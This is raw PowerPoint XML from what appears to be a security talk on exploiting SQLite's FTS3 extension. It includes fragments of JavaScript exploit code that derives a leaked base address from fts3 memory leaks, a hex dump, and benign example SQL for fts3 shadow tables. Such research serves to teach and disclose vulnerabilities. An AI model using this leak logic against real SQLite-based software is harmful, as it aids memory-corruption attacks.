              <a:t> 0x100000000</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</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 0x80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> 0x1000000</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</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 B_0x1000_offset_3bytes</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BDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>fts3_azColumn_leaked_byte_count </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D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</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F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</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fts3_zWriteExprlist_leaked_byte_count </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D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</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F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</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fts3_azColumn_leaked_value_second_byte </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fts3_zWriteExprlist_leaked_value_second_byte </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D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</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console.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>`Case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>`</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</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 fts3_azColumn_leaked_value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> 0x100000000</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</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 B_0x1000_offset_3bytes</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BDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>fts3_azColumn_leaked_byte_count </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D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</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F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</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fts3_zWriteExprlist_leaked_byte_count </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D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</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fts3_azColumn_leaked_value_second_byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> fts3_zWriteExprlist_leaked_value_second_byte</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console.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>`Case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>`</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AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wierd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> case. Only happened once...? Just gamble on the address here. Might not work.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</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 fts3_azColumn_leaked_value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> 0x100000000</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</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 0x80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> 0x1000000</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> B_0x1000_offset_3bytes</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>            console.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>`Don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'t know how to handle this case. Stopping here...`);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            return;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3509508669"/>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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>A0 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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6512766" y="3756025"/>
            <a:ext cx="307247" cy="209486"/>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24526198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Shadow Tables</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158620" y="1825624"/>
            <a:ext cx="11905862" cy="4911078"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="4B4B4B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> VIRTUAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>USING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> fts3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'sample subject1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'sample content'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'sample subject2'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'hello world'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
